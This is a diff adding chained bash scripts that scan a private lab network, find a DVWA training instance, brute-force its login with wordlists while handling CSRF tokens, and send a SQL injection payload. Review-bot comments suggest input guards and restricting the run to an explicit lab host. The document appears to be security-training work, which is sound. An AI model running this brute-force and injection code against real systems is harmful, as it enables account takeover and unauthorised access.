diff --git a/bruteForce.sh b/bruteForce.sh
new file mode 100644
index 0000000..ef0f485
--- /dev/null
+++ b/bruteForce.sh
@@ -0,0 +1,71 @@
+#vulnId.sh --> bruteForce.sh
+
+echo -e "\n---- Starting Brute Force on brute vulnerability ----"
+sleep 3s
+
+## Variables
+LOGIN_URL=$LOGIN_URL
+BRUTE_DIR=$BRUTE_DIR
+#USER and PASS found from bruteLogin.sh
+DVWA_USER=$DVWA_USER
+DVWA_PASS=$DVWA_PASS
+
+#DVWA_USER='admin'
+#DVWA_PASS='password'
+
+USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
+PASS_LIST="/usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt"
+
+## Value to look for in response in webpage source code
+SUCCESS="Welcome to the password protected area $DVWA_USER"
+
+## Anti CSRF token
+CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )"
+sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie
+
+## Login to DVWA using cookie
+curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null
+[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1
+
+## Counter
+i=0
+
+## Password loop
+while read -r _PASS; do
+
+ ## Username loop
+ while read -r _USER; do
+
+ ## Increase counter
+ ((i=i+1))
+
+ ## Display USER:PASS attempts to user
+ #echo "Try ${i}: ${_USER} : ${_PASS}"
+
+ ## Connect to web server
+ REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "$BRUTE_DIR/?username=${_USER}&password=${_PASS}&Login=Login" )"
+ [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+ ## Check response against SUCCESS string
+ echo "${REQUEST}" | grep -q "${SUCCESS}"
+ if [[ "$?" -eq 0 ]]; then
+ ## Success!
+ echo -e "\nFound at Try: ${i}"
+ echo "Username: ${_USER}"
+ echo "Password: ${_PASS}"
+
+ #echo "${REQUEST}"
+ echo "$SUCCESS"
+ sleep 3s
+ break 2
+ fi
+
+ done < ${USER_LIST}
+done < ${PASS_LIST}
+
+## Clean up
+#rm -f /tmp/dvwa.cookie
+
+export COUNT=2
+
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh
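Review bot: Nothing in bruteForce.sh checks that its inputs exist before requests go out: `LOGIN_URL=$LOGIN_URL`, `BRUTE_DIR=$BRUTE_DIR` and the two credential lines are self-assignments that do nothing, so a run started outside the chain hands curl a URL beginning with `/?username=`. Replace them with a fail-closed guard such as `: "${LOGIN_URL:?}" "${BRUTE_DIR:?}" "${DVWA_USER:?}" "${DVWA_PASS:?}"`. The `#2` check inside the loop only prints and keeps iterating, and `done < ${USER_LIST}` / `done < ${PASS_LIST}` should be quoted. The commented-out cleanup names `/tmp/dvwa.cookie`, which is not the jar path this script writes.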
diff --git a/bruteLogin.sh b/bruteLogin.sh
new file mode 100644
index 0000000..c5f7619
--- /dev/null
+++ b/bruteLogin.sh
@@ -0,0 +1,60 @@
+#scanInit.sh --> bruteLogin.sh
+
+echo -e " \n---- Starting Brute force on Login Page ---- "
+
+## Variables
+export LOGIN_URL=$LOGIN_URL
+USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
+PASS_LIST="/usr/share/seclists/Passwords/rockyou.txt"
+export IP=$INIT_IP
+
+## Value to look for in response
+SUCCESS="Location: index.php"
+
+## Counter
+i=0
+
+## Password loop
+while read -r _PASS; do
+
+ ## Username loop
+ while read -r _USER; do
+
+ ## Increase counter
+ ((i=i+1))
+
+ ## Display USER:PASS attempts to user
+ ## Comment out for less noise
+ #echo "Try ${i}: ${_USER} : ${_PASS}"
+
+ ## Connect to web server
+ CSRF=$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie $LOGIN_URL | awk -F 'value=' '/user_token/ {print $2}' | awk -F "'" '{print $2}' )
+
+ REQUEST="$( curl -sib ~/Documents/DVWA/scripts/dvwa.cookie --data "username=${_USER}&password=${_PASS}&user_token=${CSRF}&Login=Login" $LOGIN_URL )"
+ [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+ ## Check response against SUCCESS string
+ echo "${REQUEST}" | grep -q "${SUCCESS}"
+ if [[ "$?" -eq 0 ]]; then
+ ## Success!
+ echo -e "\nFound at Try ${i}:\nUsername:${_USER}\nPassword:${_PASS}"
+ sleep 3s
+
+ #export credential variables to use in next script
+ export USER="$(echo "${_USER}")"
+ export PASS="$(echo "${_PASS}")"
+
+ break 2
+ fi
+
+ done < ${USER_LIST}
+done < ${PASS_LIST}
+
+## Clean up
+rm -f ~/Documents/DVWA/scripts/dvwa.cookie
+
+#Create counter for next script
+export COUNT=1
+
+#Call next script
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh
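Review bot: `export USER=...` and `export PASS=...` in the success branch overwrite the standard `USER` login-name variable, and when the lists are exhausted without a match `USER` still holds the operator's login name, so the next stage starts with a value this script never confirmed. Export under dedicated names, `export DVWA_USER="${_USER}"` and `export DVWA_PASS="${_PASS}"`, and call vulnId.sh only when a `found=1` flag was set in that branch; vulnId.sh and sqli.sh read `$USER`/`$PASS` and would need the matching rename. The `$(echo ...)` wrappers add nothing, and `$LOGIN_URL` is unquoted in both curl calls.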
diff --git a/init.sh b/init.sh
new file mode 100644
index 0000000..095d718
--- /dev/null
+++ b/init.sh
@@ -0,0 +1,18 @@
+##init.sh
+
+##Force no internet
+#nmcli networking off
+
+##Check for internet connection
+wget -q --spider http://google.com
+if [ $? -eq 0 ]; then
+ echo "Online"
+ echo -e "---- Starting Network scans ---- \n "
+ /bin/bash ~/Documents/DVWA/scripts/scanInit.sh
+else
+ echo "No network connection"
+ echo "quitting"
+ exit
+fi
+
+
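Review bot: The failure branch ends with a bare `exit`, which returns the status of the preceding `echo` (0), so a caller cannot tell that the run was aborted; use `exit 1`. The test can also be written as `if wget -q --spider http://google.com; then` rather than inspecting `$?`. The probe targets an external host while scanInit.sh works on a private 192.168.40.x range, so it appears to require the lab machine to be Internet-connected; checking reachability of the lab network itself would let the lab stay isolated.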
diff --git a/scanInit.sh b/scanInit.sh
new file mode 100644
index 0000000..aaeab1a
--- /dev/null
+++ b/scanInit.sh
@@ -0,0 +1,33 @@
+#init.sh --> scanInit.sh
+
+##Variables
+##export local IP
+#export INIT_IP=$(ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'
+
+#Get all IP's and HTTP ports on network
+nmap -T4 -Pn 192.168.40.141/24 | grep -E 'http|([0-9]{1,3}[\.]){3}[0-9]{1,3}' | grep -v https > tmp.txt
+
+#Get HTTP ip address
+export INIT_IP=$(cat tmp.txt | grep 'http' -B 1 | grep -Eo '([0-9]{1,3}[\.]){3}[0-9]{1,3}')
+#Get HTTP port
+HTTP_PORT=$(cat tmp.txt | grep http | sed 's/[^0-9]*//g')
+
+#rm tmp.txt
+
+#HTTP_PORT=80
+
+echo "IP address: $INIT_IP"
+echo "HTTP port number: $HTTP_PORT"
+export WORD_LIST="/usr/share/dirb/wordlists/common.txt"
+
+#Create variable for the Login URL using the IP and open port number
+export LOGIN_URL=$(gobuster dir -u "$INIT_IP:$HTTP_PORT/DVWA/" -nqelw $WORD_LIST -x php | grep login | grep -o '^\S*')
+
+echo "Full Login URL: $LOGIN_URL"
+
+sleep 3s
+
+#Call next script (Brute Forcing the login page)
+/bin/bash ~/Documents/DVWA/scripts/bruteLogin.sh
+
+
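Review bot: The target is chosen by whatever the sweep of `192.168.40.141/24` returns: any host in that /24 with an http port ends up in `INIT_IP`, and if more than one matches, the variable holds several lines and `"$INIT_IP:$HTTP_PORT/DVWA/"` is malformed. Take the authorised lab host from an explicit setting and fail when it is missing, e.g. `: "${LAB_TARGET:?set to the lab DVWA host}"` (the name is only a suggestion), then stop unless `INIT_IP` is exactly one address equal to it. `tmp.txt` is written to the current directory and only removed by vulnId.sh through a relative path; a `mktemp` file with a `trap ... EXIT` would be safer. `$WORD_LIST` is unquoted and the `cat tmp.txt | grep` pipelines can read the file directly.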
diff --git a/sqli.sh b/sqli.sh
new file mode 100644
index 0000000..816767a
--- /dev/null
+++ b/sqli.sh
@@ -0,0 +1,43 @@
+#vulnId.sh --> sqli.sh
+
+#Variables
+#URL=$URL
+IP=$IP
+SQLI_DIR=$SQLI_DIR'/'
+SQLI_1=' or '1'='1
+EXT='?id=1&Submit=Submit'
+LOGIN_URL="http://192.168.40.145/DVWA/login.php/"
+DVWA_USER=$USER
+DVWA_PASS=$PASS
+
+#sqlmap -u "${SQLI_DIR}?id=&Submit=Submit" --cookie="PHPSESSID=96uqh3mj23mg50vnn2uadsj5rj;security=low" --batch --drop-set-cookie
+
+## Anti CSRF token
+CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )"
+sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie
+
+## Login to DVWA using cookie
+curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null
+[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1
+
+## Connect to server using cookie
+ REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?username=${DVWA_USER}&password=${DVWA_PASS}&Login=login${EXT}" )"
+ [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+#Display Success
+echo "${REQUEST}" | grep "Vulnerability: SQL Injection" | sed -e 's/^[ \t]*//'
+
+#Attempt SQLi with DVWA'or'1'='1
+echo -e "\n---- Attempting SQLi using DVWA'or'1'='1 ----\n"
+TEST1="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?id=DVWA'or'1'='1&Submit=Submit" )"
+ [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+#Format output
+echo "${TEST1}" | grep -o -P '(?<=pre).*(?=pre)' | sed -e 's/
/\\\n/g' -e 's/\\/ /g' -e 's/[/>]//g' -e 's//g'
+
+export COUNT=3
+
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh
+
+#Clean up
+#rm -r /root/.sqlmap/output/$IP
diff --git a/vulnId.sh b/vulnId.sh
new file mode 100644
index 0000000..2b3babf
--- /dev/null
+++ b/vulnId.sh
@@ -0,0 +1,37 @@
+#bruteLogin.sh --> vulnId.sh
+#bruteForce.sh --> vulnId.sh
+
+##Variables
+#export URL="http://192.168.40.145/DVWA/vulnerabilities"
+WORD_LIST="/usr/share/dirb/wordlists/common.txt"
+EXT="/DVWA/vulnerabilities"
+COUNT=$COUNT
+#export COUNT=$COUNT
+export DVWA_USER=$USER
+export DVWA_PASS=$PASS
+export LOGIN_URL=$LOGIN_URL
+export IP=$IP
+
+case $COUNT in
+ 1)
+ #dirb on DVWA home page to find brute vulnerability directory
+ echo -e "\n---- Finding brute force directory ----\n"
+ export BRUTE_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/brute ' | grep -o '^\S*')
+ echo -e "Directory with brute vulnerability: $BRUTE_DIR"
+ sleep 5s
+ /bin/bash ~/Documents/DVWA/scripts/bruteForce.sh
+ ;;
+ 2)
+ #find sqli vulnerability directory
+ echo -e "\n---- Finding SQL injection directory ----\n"
+ export SQLI_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/sqli ' | grep -o '^\S*')
+ echo -e "Directory with sqli vulnerability: $SQLI_DIR \n"
+ sleep 5s
+ /bin/bash ~/Documents/DVWA/scripts/sqli.sh
+ ;;
+ 3)
+ rm tmp.txt
+ rm dvwa.cookie
+ ;;
+ *)
+esac
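Review bot: In sqli.sh, `LOGIN_URL="http://192.168.40.145/DVWA/login.php/"` hard-codes an address instead of using the `LOGIN_URL` exported by the earlier stages, so this stage can address a different host from the one the rest of the run identified; drop the assignment and guard with `: "${LOGIN_URL:?}"`. The commented-out sqlmap line embeds a literal `PHPSESSID` value, which should not be committed even as a comment. `SQLI_1` and `IP=$IP` are not used by any active line and can be removed.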
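Review bot: In vulnId.sh, the `3)` arm removes `tmp.txt` and `dvwa.cookie` by relative name, but the other scripts write the jar to `~/Documents/DVWA/scripts/dvwa.cookie`, so the session cookie stays on disk unless the chain was started from that directory. Use the same absolute path, `rm -f -- ~/Documents/DVWA/scripts/dvwa.cookie`, and give the empty `*)` arm a message and a non-zero exit, e.g. `*) echo "unexpected COUNT: $COUNT" >&2; exit 1 ;;`. `$IP`, `$EXT` and `$WORD_LIST` are unquoted in both gobuster calls.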